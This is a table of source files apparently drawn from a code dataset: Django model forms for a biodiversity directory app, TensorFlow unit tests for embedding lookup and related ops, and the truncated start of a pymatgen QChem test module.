code | repo_name | path | language | license | size
---|---|---|---|---|---
stringlengths 3–1.05M | stringlengths 5–104 | stringlengths 4–251 | stringclasses 1 value | stringclasses 15 values | int64 3–1.05M
# -*- coding: UTF-8 -*-
from django import forms
from models import *
import re
from django.utils.translation import ugettext, ugettext_lazy as _


class MiembrosInstForm(forms.ModelForm):
    class Meta:
        model = MiembrosdeInstituciones
        fields = ('institucion','miembros','estatu')


class RedactarForm(forms.ModelForm):
    class Meta:
        model = SistemaMensajeria
        fields = ('remi','destino','asunto','mensaje','estatu')


class OrganizacionesForm(forms.ModelForm):
    class Meta:
        model = Actores
        fields = ('tiposAreasAccion','actoresrex','bancoaudio','horarios','fund','url','ambitoaccion','principalesorgfinan','objetivos','publicacionesPeriodicas','aniofundacion','telefono','fax','address','geolocation','rif','siglas','nombre','nombre_completo','direccion','pai','estado','municipio','parroquia','correo','reseniahistorica','pubp','grupobio','logotipo','categoriact','tipocolec','particularidades','estrOrganz','actinteres','coord','estrucorg','tipoorganizacion','userupdate','areasesconserv','directorio','estatu')


class PersonasForm(forms.ModelForm):
    class Meta:
        model = Directorios
        fields = ('documentoidentidad','nombre','apellido','correo','telefono1','telefono2','movil','fax','pai','estado',
                  'municipio','parroquia','sector','gruposespecie','areasaccion')


class FormularioActualizarDatos1(forms.ModelForm):
    class Meta:
        model = Directorios
        fields = ('nombre','apellido','nacimiento','sexo','pai','estado','municipio','parroquia')


class UserCreationFormSVIDB(forms.ModelForm):
    """
    A form that creates a user, with no privileges, from the given username and
    password.
    """
    error_messages = {
        'duplicate_username': _("A user with that username already exists."),
        'password_mismatch': _("The two password fields didn't match."),
    }
    username = forms.RegexField(
        label=_("Username"), max_length=255,
        regex=r'^[\w.@+-]+$',
        help_text=_("Required. 255 characters or fewer. Letters, digits and "
                    "@/./+/-/_ only."),
        error_messages={
            'invalid': _("This value may contain only letters, numbers and "
                         "@/./+/-/_ characters.")})
    password1_confirmation = forms.CharField(label=_("Password"),
                                             widget=forms.PasswordInput)
    password1 = forms.CharField(label=_("Password confirmation"),
                                widget=forms.PasswordInput,
                                help_text=_("Enter the same password as above, for verification."))

    class Meta:
        model = User
        fields = ("username",)

    def clean_username(self):
        # Since User.username is unique, this check is redundant,
        # but it sets a nicer error message than the ORM. See #13147.
        username = self.cleaned_data["username"]
        try:
            User.objects.get(username=username)
        except User.DoesNotExist:
            return username
        raise forms.ValidationError(self.error_messages['duplicate_username'])

    def clean_password1(self):
        password1_confirmation = self.cleaned_data.get("password1_confirmation", "")
        password1 = self.cleaned_data["password1"]
        if password1_confirmation != password1:
            raise forms.ValidationError(
                self.error_messages['password_mismatch'])
        return password1

    def save(self, commit=True):
        user = super(UserCreationFormSVIDB, self).save(commit=False)
        user.set_password(self.cleaned_data["password1_confirmation"])
        if commit:
            user.save()
        return user
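
# Illustrative sketch (not part of the original file): a minimal view that drives
# UserCreationFormSVIDB. The view name, template name and redirect target are
# assumptions; only the form behaviour defined above is taken from this module.
def registrar_usuario_sketch(request):
    from django.shortcuts import redirect, render
    if request.method == 'POST':
        form = UserCreationFormSVIDB(request.POST)
        if form.is_valid():
            form.save()  # hashes the password via set_password() before saving
            return redirect('/')
    else:
        form = UserCreationFormSVIDB()
    return render(request, 'registro.html', {'form': form})
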
class PersonasRegForm(forms.ModelForm):
    class Meta:
        model = Directorios
        fields = ('tipodoci','documentoidentidad','nombre','apellido')


class FormularioPersonaEventos(forms.ModelForm):
    class Meta:
        model = Directorios
        fields = ('tipodoci','documentoidentidad','nombre','apellido','sexo','nacimiento','pai','estado',
                  'municipio','parroquia')


class PersonasEditForm(forms.ModelForm):
    class Meta:
        model = Directorios
        fields = ('id','nombre','apellido','sexo','edocivil','nacimiento','correo','telefono1','telefono2','movil','fax','pai','estado',
                  'municipio','parroquia','sector','gruposespecie','areasaccion')


class PersonasEditFormNew(forms.ModelForm):
    class Meta:
        model = Directorios
        fields = ('tipodoci','documentoidentidad','nombre','apellido','sexo','edocivil','nacimiento','correo','telefono1','telefono2','movil','fax','pai','estado',
                  'municipio','parroquia','sector','gruposespecie','areasaccion')


class PersonasEditForm2(forms.ModelForm):
    class Meta:
        model = Directorios
        fields = ('id','nombre','apellido','sexo','nacimiento','correo','telefono1','telefono2','movil','fax','pai','estado',
                  'municipio','parroquia','sector','gruposespecie','areasaccion')


class coautorform(forms.ModelForm):
    class Meta:
        model = Directorios
        fields = ('tipodoci','documentoidentidad','nombre','apellido','movil')


class InstitucionesForm(forms.ModelForm):
    class Meta:
        model = Actores
        fields = ('tipoorganizacion','nombre_completo','telefono','fax','siglas','correo','pai','estado','direccion',
                  'rif','ambitoaccion')


class AgregarBibliotecaPublic(forms.ModelForm):
    class Meta:
        model = Bibliotecas
        fields = ('titulo','fecha','autores','directorio','editorial','ibsn','edicion','numerovolumen','resumen','observaciones',
                  'tipodocs','userupdate','estatu','idioma','numeropaginas','repositoriolinea','licencia')


class AgregarBancoaudiovisualsPublic(forms.ModelForm):
    class Meta:
        model = Bancoaudiovisuals
        fields = ('directorio','fecha','lugar','descripcion','tipo','pathimg','licencia','observaciones','userupdate','estatu',
                  'seccion')
| desarrollosimagos/svidb | administrativo/actores/forms.py | Python | gpl-3.0 | 6,041 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for ops used with embeddings."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
def _AsLong(array):
"""Casts arrays elements to long type. Used to convert from numpy tf."""
return [int(x) for x in array]
class ScatterAddSubTest(tf.test.TestCase):
def _TestCase(self, shape, indices, scatter_op=tf.scatter_add):
"""Run a random test case with the given shape and indices.
Args:
shape: Shape of the parameters array.
indices: One-dimensional array of ints, the indices of the last dimension
of the parameters to update.
scatter_op: ScatterAdd or ScatterSub.
"""
super(ScatterAddSubTest, self).setUp()
with self.test_session(use_gpu=False):
# Create a random parameter array of given shape
p_init = np.random.rand(*shape).astype("f")
# Create the shape of the update array. All dimensions except the last
# match the parameter array, the last dimension equals the # of indices.
vals_shape = [len(indices)] + shape[1:]
vals_init = np.random.rand(*vals_shape).astype("f")
v_i = [float(x) for x in vals_init.ravel()]
p = tf.Variable(p_init)
vals = tf.constant(v_i, shape=vals_shape, name="vals")
ind = tf.constant(indices, dtype=tf.int32)
p2 = scatter_op(p, ind, vals, name="updated_p")
# p = init
tf.global_variables_initializer().run()
# p += vals
result = p2.eval()
# Compute the expected 'p' using numpy operations.
for i, ind in enumerate(indices):
if scatter_op == tf.scatter_add:
p_init.reshape(shape[0], -1)[ind, :] += (
vals_init.reshape(vals_shape[0], -1)[i, :])
else:
p_init.reshape(shape[0], -1)[ind, :] -= (
vals_init.reshape(vals_shape[0], -1)[i, :])
self.assertTrue(all((p_init == result).ravel()))
def testNoRepetitions(self):
self._TestCase([2, 2], [1])
self._TestCase([4, 4, 4], [2, 0])
self._TestCase([43, 20, 10, 10], [42, 5, 6, 1, 3, 5, 7, 9])
def testWithRepetitions(self):
self._TestCase([2, 2], [1, 1])
self._TestCase([5, 3, 9, 5], [2, 0, 4, 1, 3, 1, 4, 0, 4, 3])
self._TestCase([32, 4, 4], [31] * 8)
def testRandom(self):
# Random shapes of rank 4, random indices
for _ in range(5):
shape = np.random.randint(1, 20, size=4)
indices = np.random.randint(shape[0], size=2 * shape[0])
self._TestCase(_AsLong(list(shape)), list(indices))
def testSubRandom(self):
# Random shapes of rank 4, random indices
for _ in range(5):
shape = np.random.randint(1, 20, size=4)
indices = np.random.randint(shape[0], size=2 * shape[0])
self._TestCase(_AsLong(list(shape)), list(indices),
tf.scatter_sub)
def testWrongShape(self):
# Indices and values mismatch.
var = tf.Variable(tf.zeros(shape=[1024, 64, 64], dtype=tf.float32))
indices = tf.placeholder(tf.int32, shape=[32])
values = tf.placeholder(tf.float32, shape=[33, 64, 64])
with self.assertRaises(ValueError):
tf.scatter_add(var, indices, values)
# Var and values mismatch.
values = tf.placeholder(tf.float32, shape=[32, 64, 63])
with self.assertRaises(ValueError):
tf.scatter_add(var, indices, values)
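# Illustrative numpy-only sketch (not part of the original tests): what the scatter
# ops exercised above compute when indices repeat; contributions to the same row
# accumulate, exactly as the expected-value loop in _TestCase does.
def _ExampleNumpyScatterAdd():
  p = np.zeros((3, 2), dtype=np.float32)
  indices = [1, 1, 2]
  vals = np.array([[1., 1.], [2., 2.], [5., 5.]], dtype=np.float32)
  for i, ind in enumerate(indices):
    p[ind, :] += vals[i, :]
  return p  # row 1 ends up as [3., 3.] and row 2 as [5., 5.]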
def _PName(param_id):
return "p" + str(param_id)
def _EmbeddingParams(num_shards, vocab_size,
dtype=tf.float32,
shape=None,
use_shapeless_placeholder=False):
p = []
params = {}
feed_dict = {}
if not shape: shape = [10]
for i in range(num_shards):
shard_shape = [vocab_size // num_shards] + shape
if i < vocab_size % num_shards: # Excess goes evenly on the first shards
shard_shape[0] += 1
param_name = _PName(i)
if use_shapeless_placeholder:
param = tf.placeholder(dtype, shape=None, name=param_name)
else:
param = tf.constant(1.0, shape=shard_shape, dtype=dtype, name=param_name)
p.append(param)
np_type = "f" if dtype == tf.float32 else "d"
val = (np.random.rand(*shard_shape).astype(np_type)) + 1
params[param_name + ":0"] = val
feed_dict[param.name] = val
return p, params, feed_dict
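# Illustrative sketch (assumed values, not part of the original tests): how
# _EmbeddingParams sizes its shards. The excess ids go to the first shards, so
# vocab_size=13 split over num_shards=5 gives row counts [3, 3, 3, 2, 2].
def _ExampleShardSizes(vocab_size=13, num_shards=5):
  sizes = []
  for i in range(num_shards):
    rows = vocab_size // num_shards + (1 if i < vocab_size % num_shards else 0)
    sizes.append(rows)
  return sizes  # [3, 3, 3, 2, 2] for the assumed values above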
def _EmbeddingParamsAsPartitionedVariable(num_shards, vocab_size,
dtype=tf.float32, shape=None):
p, params, feed_dict = _EmbeddingParams(
num_shards, vocab_size, dtype=dtype, shape=shape)
shape = shape or [10]
partitioned_variable = tf.get_variable(
"p",
shape=[vocab_size] + shape,
initializer=tf.concat(0, [params[p_i.name] for p_i in p]),
partitioner=tf.min_max_variable_partitioner(
max_partitions=num_shards, min_slice_size=1))
return p, partitioned_variable, params, feed_dict
def _EmbeddingResult(params, id_vals, num_shards, vocab_size,
partition_strategy="mod",
weight_vals=None):
if weight_vals is None:
weight_vals = np.copy(id_vals)
weight_vals.fill(1)
values = []
weights = []
weights_squared = []
for ids, wts in zip(id_vals, weight_vals):
value_aggregation = None
weight_aggregation = None
squared_weight_aggregation = None
if isinstance(ids, tf.compat.integral_types):
ids = [ids]
wts = [wts]
for i, weight_value in zip(ids, wts):
if partition_strategy == "mod":
val = np.copy(params[_PName(i % num_shards) + ":0"][
i // num_shards, :]) * weight_value
elif partition_strategy == "div":
ids_per_partition, extras = divmod(vocab_size, num_shards)
threshold = extras * (ids_per_partition + 1)
if i < threshold:
partition = i // (ids_per_partition + 1)
offset = i % (ids_per_partition + 1)
else:
partition = extras + (i - threshold) // ids_per_partition
offset = (i - threshold) % ids_per_partition
val = np.copy(
params[_PName(partition) + ":0"][offset, :]) * weight_value
else:
assert False
if value_aggregation is None:
assert weight_aggregation is None
assert squared_weight_aggregation is None
value_aggregation = val
weight_aggregation = weight_value
squared_weight_aggregation = weight_value * weight_value
else:
assert weight_aggregation is not None
assert squared_weight_aggregation is not None
value_aggregation += val
weight_aggregation += weight_value
squared_weight_aggregation += weight_value * weight_value
values.append(value_aggregation)
weights.append(weight_aggregation)
weights_squared.append(squared_weight_aggregation)
values = np.array(values).astype(np.float32)
weights = np.array(weights).astype(np.float32)
weights_squared = np.array(weights_squared).astype(np.float32)
return values, weights, weights_squared
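# Illustrative sketch (assumed values, not part of the original tests): the "div"
# partition strategy handled in _EmbeddingResult maps a global id to a
# (partition, offset) pair. With vocab_size=13 and num_shards=5, divmod gives
# ids_per_partition=2 and extras=3, so ids 0-8 land in the three partitions of
# size 3 and ids 9-12 in the two partitions of size 2.
def _ExampleDivPartition(i, vocab_size=13, num_shards=5):
  ids_per_partition, extras = divmod(vocab_size, num_shards)
  threshold = extras * (ids_per_partition + 1)
  if i < threshold:
    return i // (ids_per_partition + 1), i % (ids_per_partition + 1)
  return (extras + (i - threshold) // ids_per_partition,
          (i - threshold) % ids_per_partition)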
class EmbeddingLookupTest(tf.test.TestCase):
# This test looks up [0, 0] in a parameter matrix sharded 2 ways. Since
# both ids are in the first shard, one of the resulting lookup
# vectors is going to be empty. The subsequent DivOp fails because of that.
# TODO(keveman): Disabling the test until the underlying problem is fixed.
def testSimpleSharded(self):
with self.test_session():
num_shards = 2
vocab_size = 4
p, params, feed_dict = _EmbeddingParams(num_shards, vocab_size)
id_vals = np.array([0, 0])
ids = tf.constant(list(id_vals), dtype=tf.int32)
print("Construct ids", ids.get_shape())
embedding = tf.nn.embedding_lookup(p, ids)
tf_result = embedding.eval(feed_dict=feed_dict)
np_result, _, _ = _EmbeddingResult(params, id_vals, num_shards, vocab_size)
self.assertAllEqual(np_result, tf_result)
self.assertShapeEqual(np_result, embedding)
def testMaxNorm(self):
with self.test_session():
embeddings = tf.constant([[2.0]])
ids = tf.constant([0], dtype=tf.int32)
embedding = tf.nn.embedding_lookup([embeddings], ids, max_norm=1.0)
self.assertAllEqual(embedding.eval(), [[1.0]])
def testMaxNormNontrivial(self):
with self.test_session():
embeddings = tf.constant([[2.0, 4.0], [3.0, 1.0]])
ids = tf.constant([0, 1], dtype=tf.int32)
embedding = tf.nn.embedding_lookup([embeddings], ids, max_norm=2.0)
norms = tf.sqrt(tf.reduce_sum(embeddings * embeddings, axis=1))
normalized = embeddings/tf.stack([norms, norms], axis=1)
self.assertAllEqual(embedding.eval(), 2 * normalized.eval())
def testSimpleShardedPartitionedVariable(self):
with self.test_session() as sess:
num_shards = 2
vocab_size = 4
p, p_variable, params, feed_dict = _EmbeddingParamsAsPartitionedVariable(
num_shards, vocab_size)
id_vals = np.array([0, 0])
ids = tf.constant(list(id_vals), dtype=tf.int32)
print("Construct ids", ids.get_shape())
embedding = tf.nn.embedding_lookup(p_variable, ids)
tf.global_variables_initializer().run()
params_values = [params[p_i.name] for p_i in p]
# Test that the PartitionedVariable components equal the list in p
p_var_val = sess.run(list(p_variable))
# Actual test
tf_result = embedding.eval(feed_dict=feed_dict)
np_result, _, _ = _EmbeddingResult(params, id_vals, num_shards, vocab_size)
self.assertAllEqual(params_values, p_var_val)
self.assertAllEqual(np_result, tf_result)
self.assertShapeEqual(np_result, embedding)
def testShardedModPartitioningInt32Ids(self):
with self.test_session():
num_shards = 5
vocab_size = 13
# Embedding dimensions is 10. The vocab_size x 10 embedding
# parameters are spread in num_shards matrices, so the first
# 3 shards are 3 x 10 and the last 2 shards are 2 x 10.
p, params, feed_dict = _EmbeddingParams(num_shards, vocab_size)
num_vals = 30
# Fetch num_vals embeddings for random word ids. Since
# num_vals > vocab_size, this ought to have repetitions, so
# will test that aspect.
id_vals = np.random.randint(vocab_size, size=num_vals)
ids = tf.constant(list(id_vals), dtype=tf.int32)
embedding = tf.nn.embedding_lookup(p, ids)
tf_result = embedding.eval(feed_dict=feed_dict)
np_result, _, _ = _EmbeddingResult(params, id_vals, num_shards, vocab_size)
self.assertAllEqual(np_result, tf_result)
self.assertShapeEqual(np_result, embedding)
def testShardedModPartitioningInt64Ids(self):
with self.test_session():
num_shards = 5
vocab_size = 13
# Embedding dimensions is 10. The vocab_size x 10 embedding
# parameters are spread in num_shards matrices, so the first
# 3 shards are 3 x 10 and the last 2 shards are 2 x 10.
p, params, feed_dict = _EmbeddingParams(num_shards, vocab_size)
num_vals = 30
# Fetch num_vals embeddings for random word ids. Since
# num_vals > vocab_size, this ought to have repetitions, so
# will test that aspect.
id_vals = np.random.randint(vocab_size, size=num_vals)
ids = tf.constant(list(id_vals), dtype=tf.int64)
embedding = tf.nn.embedding_lookup(p, ids)
tf_result = embedding.eval(feed_dict=feed_dict)
np_result, _, _ = _EmbeddingResult(params, id_vals, num_shards, vocab_size)
self.assertAllEqual(np_result, tf_result)
self.assertShapeEqual(np_result, embedding)
def testShardedDivPartitioningInt32Ids(self):
with self.test_session():
num_shards = 5
vocab_size = 13
# Embedding dimensions is 10. The vocab_size x 10 embedding
# parameters are spread in num_shards matrices, so the first
# 3 shards are 3 x 10 and the last 2 shards are 2 x 10.
p, params, feed_dict = _EmbeddingParams(num_shards, vocab_size)
num_vals = 30
# Fetch num_vals embeddings for random word ids. Since
# num_vals > vocab_size, this ought to have repetitions, so
# will test that aspect.
id_vals = np.random.randint(vocab_size, size=num_vals)
ids = tf.constant(list(id_vals), dtype=tf.int32)
embedding = tf.nn.embedding_lookup(p, ids, partition_strategy="div")
tf_result = embedding.eval(feed_dict=feed_dict)
np_result, _, _ = _EmbeddingResult(
params, id_vals, num_shards, vocab_size, partition_strategy="div")
self.assertAllEqual(np_result, tf_result)
self.assertShapeEqual(np_result, embedding)
def testShardedDivPartitioningInt32IdsPartitionedVariable(self):
with self.test_session():
num_shards = 5
vocab_size = 13
# Embedding dimensions is 10. The vocab_size x 10 embedding
# parameters are spread in num_shards matrices, so the first
# 3 shards are 3 x 10 and the last 2 shards are 2 x 10.
_, p_variable, params, feed_dict = _EmbeddingParamsAsPartitionedVariable(
num_shards, vocab_size)
num_vals = 30
# Fetch num_vals embeddings for random word ids. Since
# num_vals > vocab_size, this ought to have repetitions, so
# will test that aspect.
id_vals = np.random.randint(vocab_size, size=num_vals)
ids = tf.constant(list(id_vals), dtype=tf.int32)
tf.global_variables_initializer().run()
embedding = tf.nn.embedding_lookup(
p_variable, ids, partition_strategy="div")
tf_result = embedding.eval(feed_dict=feed_dict)
np_result, _, _ = _EmbeddingResult(
params, id_vals, num_shards, vocab_size, partition_strategy="div")
self.assertAllEqual(np_result, tf_result)
self.assertShapeEqual(np_result, embedding)
def testShardedDivPartitioningInt64Ids(self):
with self.test_session():
num_shards = 5
vocab_size = 13
# Embedding dimensions is 10. The vocab_size x 10 embedding
# parameters are spread in num_shards matrices, so the first
# 3 shards are 3 x 10 and the last 2 shards are 2 x 10.
p, params, feed_dict = _EmbeddingParams(num_shards, vocab_size)
num_vals = 30
# Fetch num_vals embeddings for random word ids. Since
# num_vals > vocab_size, this ought to have repetitions, so
# will test that aspect.
id_vals = np.random.randint(vocab_size, size=num_vals)
ids = tf.constant(list(id_vals), dtype=tf.int64)
embedding = tf.nn.embedding_lookup(p, ids, partition_strategy="div")
tf_result = embedding.eval(feed_dict=feed_dict)
np_result, _, _ = _EmbeddingResult(
params, id_vals, num_shards, vocab_size, partition_strategy="div")
self.assertAllEqual(np_result, tf_result)
self.assertShapeEqual(np_result, embedding)
def testShardedDivPartitioningUnknownParamShape(self):
with self.test_session():
num_shards = 5
vocab_size = 13
# Embedding dimensions is 10. The vocab_size x 10 embedding
# parameters are spread in num_shards matrices, so the first
# 3 shards are 3 x 10 and the last 2 shards are 2 x 10.
# We clear parameter shapes, to test when shape is not statically known.
p, params, feed_dict = _EmbeddingParams(
num_shards, vocab_size, use_shapeless_placeholder=True)
num_vals = 30
# Fetch num_vals embeddings for random word ids. Since
# num_vals > vocab_size, this ought to have repetitions, so
# will test that aspect.
id_vals = np.random.randint(vocab_size, size=num_vals)
ids = tf.constant(list(id_vals), dtype=tf.int64)
embedding = tf.nn.embedding_lookup(p, ids, partition_strategy="div")
tf_result = embedding.eval(feed_dict=feed_dict)
np_result, _, _ = _EmbeddingResult(
params, id_vals, num_shards, vocab_size, partition_strategy="div")
self.assertAllEqual(np_result, tf_result)
def testGradientsEmbeddingLookup(self):
vocab_size = 9
num_ids = 10
id_vals = list(np.random.randint(vocab_size, size=num_ids))
tf.logging.vlog(1, id_vals)
for ids_shape in [(10,), (2, 5)]:
for num_shards in [1, 3]:
with self.test_session():
ids = tf.constant(id_vals, shape=ids_shape, dtype=tf.int32)
x, params, _ = _EmbeddingParams(
num_shards, vocab_size, shape=[2])
y = tf.nn.embedding_lookup(x, ids)
y_shape = [num_ids] + list(params[_PName(0) + ":0"].shape[1:])
x_name = [_PName(i) for i in range(num_shards)]
x_init_value = [params[x_n + ":0"] for x_n in x_name]
x_shape = [i.shape for i in x_init_value]
err = tf.test.compute_gradient_error(x,
x_shape,
y,
y_shape,
x_init_value=x_init_value)
self.assertLess(err, 1e-4)
def testGradientsEmbeddingLookupWithComputedParams(self):
vocab_size = 9
num_ids = 5
id_vals = list(np.random.randint(vocab_size, size=num_ids))
tf.logging.vlog(1, id_vals)
for num_shards in [1, 3]:
with self.test_session():
ids = tf.constant(id_vals, dtype=tf.int32)
x, params, _ = _EmbeddingParams(
num_shards, vocab_size, shape=[2])
# This will force a conversion from IndexedSlices to Tensor.
x_squared = [tf.square(elem) for elem in x]
y = tf.nn.embedding_lookup(x_squared, ids)
y_shape = [num_ids] + list(params[_PName(0) + ":0"].shape[1:])
x_name = [_PName(i) for i in range(num_shards)]
x_init_value = [params[x_n + ":0"] for x_n in x_name]
x_shape = [i.shape for i in x_init_value]
err = tf.test.compute_gradient_error(x,
x_shape,
y,
y_shape,
x_init_value=x_init_value)
self.assertLess(err, 1e-3)
def testConstructionNonSharded(self):
with tf.Graph().as_default():
p = tf.Variable(tf.zeros(shape=[100, 100], dtype=tf.float32))
ids = tf.constant([0, 1, 1, 7], dtype=tf.int32)
tf.nn.embedding_lookup([p], ids)
def testConstructionSharded(self):
with tf.Graph().as_default():
p = []
for _ in range(2):
p += [tf.Variable(tf.zeros(shape=[100, 100], dtype=tf.float32))]
ids = tf.constant([0, 1, 1, 17], dtype=tf.int32)
tf.nn.embedding_lookup(p, ids)
def testHigherRank(self):
np.random.seed(8)
with self.test_session():
for params_shape in (12,), (6, 3):
params = np.random.randn(*params_shape)
for ids_shape in (3, 2), (4, 3):
ids = np.random.randint(params.shape[0],
size=np.prod(ids_shape)).reshape(ids_shape)
# Compare nonsharded to gather
simple = tf.nn.embedding_lookup(params, ids).eval()
self.assertAllEqual(simple, tf.gather(params, ids).eval())
# Run a few random sharded versions
for procs in 1, 2, 3:
stride = procs * tf.range(params.shape[0] // procs)
split_params = [tf.gather(params, stride + p)
for p in xrange(procs)]
sharded = tf.nn.embedding_lookup(split_params, ids).eval()
self.assertAllEqual(simple, sharded)
class EmbeddingLookupSparseTest(tf.test.TestCase):
def _RandomIdsAndWeights(self, batch_size, vocab_size):
max_val_per_entry = 6
vals_per_batch_entry = np.random.randint(
1, max_val_per_entry, size=batch_size)
num_vals = np.sum(vals_per_batch_entry)
ids = np.random.randint(vocab_size, size=num_vals)
weights = 1 + np.random.rand(num_vals)
indices = []
for batch_entry, num_val in enumerate(vals_per_batch_entry):
for val_index in range(num_val):
indices.append([batch_entry, val_index])
shape = [batch_size, max_val_per_entry]
sp_ids = tf.SparseTensor(
tf.constant(indices, tf.int64),
tf.constant(ids, tf.int32),
tf.constant(shape, tf.int64))
sp_weights = tf.SparseTensor(
tf.constant(indices, tf.int64),
tf.constant(weights, tf.float32),
tf.constant(shape, tf.int64))
return sp_ids, sp_weights, ids, weights, vals_per_batch_entry
def _GroupByBatchEntry(self, vals, vals_per_batch_entry):
grouped_vals = []
index = 0
for num_val in vals_per_batch_entry:
grouped_vals.append(list(vals[index: (index + num_val)]))
index += num_val
return grouped_vals
def testEmbeddingLookupSparse(self):
vocab_size = 13
batch_size = 10
param_shape = [2, 5]
expected_lookup_result_shape = [None] + param_shape
sp_ids, sp_weights, ids, weights, vals_per_batch_entry = (
self._RandomIdsAndWeights(batch_size, vocab_size))
grouped_ids = self._GroupByBatchEntry(ids, vals_per_batch_entry)
grouped_weights = self._GroupByBatchEntry(weights, vals_per_batch_entry)
grouped_ignored_weights = self._GroupByBatchEntry(
np.ones(np.sum(vals_per_batch_entry)), vals_per_batch_entry)
for num_shards, combiner, dtype, ignore_weights in itertools.product(
[1, 5],
["sum", "mean", "sqrtn"],
[tf.float32, tf.float64],
[True, False]):
with self.test_session():
p, params, feed_dict = _EmbeddingParams(num_shards, vocab_size,
shape=param_shape,
dtype=dtype)
embedding_sum = tf.nn.embedding_lookup_sparse(
p, sp_ids, None if ignore_weights else sp_weights,
combiner=combiner)
self.assertEqual(embedding_sum.get_shape().as_list(),
expected_lookup_result_shape)
tf_embedding_sum = embedding_sum.eval(feed_dict=feed_dict)
np_embedding_sum, np_weight_sum, np_weight_sq_sum = _EmbeddingResult(
params, grouped_ids, num_shards, vocab_size,
weight_vals=grouped_ignored_weights
if ignore_weights else grouped_weights)
if combiner == "mean":
np_embedding_sum /= np.reshape(np_weight_sum, (batch_size, 1, 1))
if combiner == "sqrtn":
np_embedding_sum /= np.reshape(
np.sqrt(np_weight_sq_sum), (batch_size, 1, 1))
self.assertAllClose(np_embedding_sum, tf_embedding_sum)
def testGradientsEmbeddingLookupSparse(self):
vocab_size = 12
batch_size = 4
param_shape = [2, 3]
sp_ids, sp_weights, _, _, _ = (
self._RandomIdsAndWeights(batch_size, vocab_size))
for num_shards, combiner, dtype, ignore_weights in itertools.product(
[1, 3],
["sum", "mean", "sqrtn"],
[tf.float32, tf.float64],
[True, False]):
with self.test_session():
x, params, _ = _EmbeddingParams(num_shards, vocab_size,
shape=param_shape,
dtype=dtype)
y = tf.nn.embedding_lookup_sparse(
x, sp_ids, None if ignore_weights else sp_weights,
combiner=combiner)
x_name = [_PName(i) for i in range(num_shards)]
x_init_value = [params[x_n + ":0"] for x_n in x_name]
x_shape = [i.shape for i in x_init_value]
y_shape = [batch_size] + list(params[_PName(0) + ":0"].shape[1:])
err = tf.test.compute_gradient_error(x,
x_shape,
y,
y_shape,
x_init_value=x_init_value)
self.assertLess(err, 1e-5 if dtype == tf.float64 else 2e-3)
def testIncompatibleShapes(self):
with self.test_session():
x, _, _ = _EmbeddingParams(1, 10, dtype=tf.float32)
sp_ids = tf.SparseTensor(
tf.constant([[0, 0], [0, 1], [1, 0]], tf.int64),
tf.constant([0, 1, 2], tf.int32),
tf.constant([2, 2], tf.int64))
sp_weights = tf.SparseTensor(
tf.constant([[0, 0], [0, 1]], tf.int64),
tf.constant([12.0, 5.0], tf.float32),
tf.constant([1, 2], tf.int64))
with self.assertRaises(ValueError):
tf.nn.embedding_lookup_sparse(x, sp_ids, sp_weights, combiner="mean")
class DynamicStitchOpTest(tf.test.TestCase):
def testCint32Cpu(self):
with self.test_session(use_gpu=False):
indices = [tf.convert_to_tensor([0, 1, 2]), tf.convert_to_tensor([2, 3])]
values = [tf.convert_to_tensor([12, 23, 34]), tf.convert_to_tensor([1, 2])]
self.assertAllEqual(
tf.dynamic_stitch(indices, values).eval(), [12, 23, 1, 2])
def testCint32Gpu(self):
with self.test_session(use_gpu=True):
indices = [tf.convert_to_tensor([0, 1, 2]), tf.convert_to_tensor([2, 3])]
values = [tf.convert_to_tensor([12, 23, 34]), tf.convert_to_tensor([1, 2])]
self.assertAllEqual(
tf.dynamic_stitch(indices, values).eval(), [12, 23, 1, 2])
def testInt32Cpu(self):
with self.test_session(use_gpu=False):
indices = [tf.convert_to_tensor([0, 1, 2]), tf.convert_to_tensor([2, 3])]
values = [tf.convert_to_tensor([12, 23, 34]), tf.convert_to_tensor([1, 2])]
self.assertAllEqual(
tf.dynamic_stitch(indices, values).eval(), [12, 23, 1, 2])
def testInt32Gpu(self):
with self.test_session(use_gpu=True):
indices = [tf.convert_to_tensor([0, 1, 2]), tf.convert_to_tensor([2, 3])]
values = [tf.convert_to_tensor([12, 23, 34]), tf.convert_to_tensor([1, 2])]
self.assertAllEqual(
tf.dynamic_stitch(indices, values).eval(), [12, 23, 1, 2])
def testSumGradArgs(self):
with self.test_session(use_gpu=False):
indices = [tf.convert_to_tensor([0, 1, 2, 3]),
tf.convert_to_tensor([2, 3])]
values = [tf.convert_to_tensor([2, 3, 5, 7]), tf.convert_to_tensor([1, 1])]
self.assertAllEqual(
tf.dynamic_stitch(indices, values).eval(), [2, 3, 1, 1])
# We expect that the values are merged in order.
def testStitchOrder(self):
with self.test_session():
indices = []
np_values = []
values = []
for _ in range(10):
indices.extend([tf.convert_to_tensor(np.arange(100).astype(np.int32))])
np_values.extend([np.random.uniform(size=100)])
values.extend([tf.convert_to_tensor(np_values[-1])])
stitched = tf.dynamic_stitch(indices, values).eval()
self.assertAllEqual(np_values[-1], stitched)
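# Illustrative numpy-only sketch (not part of the original tests): dynamic_stitch
# scatters values[i] to the positions named by indices[i]; when an index appears
# in more than one slice, the later slice wins, which is what testSumGradArgs and
# testStitchOrder rely on.
def _ExampleDynamicStitch(indices, values):
  size = max(int(np.max(idx)) for idx in indices) + 1
  out = np.zeros(size, dtype=np.asarray(values[0]).dtype)
  for idx, val in zip(indices, values):
    out[np.asarray(idx)] = np.asarray(val)
  return out  # e.g. [[0, 1, 2, 3], [2, 3]], [[2, 3, 5, 7], [1, 1]] -> [2, 3, 1, 1]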
if __name__ == "__main__":
tf.test.main()
| DCSaunders/tensorflow | tensorflow/python/kernel_tests/embedding_ops_test.py | Python | apache-2.0 | 27,359 |
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import unicode_literals
import copy
import glob
import json
import os
import unittest
from pymatgen import Molecule
from pymatgen.io.qchem import QcTask, QcInput, QcOutput
from pymatgen.util.testing import PymatgenTest
__author__ = 'xiaohuiqu'
test_dir = os.path.join(os.path.dirname(__file__), "..", "..", "..",
'test_files', "molecules")
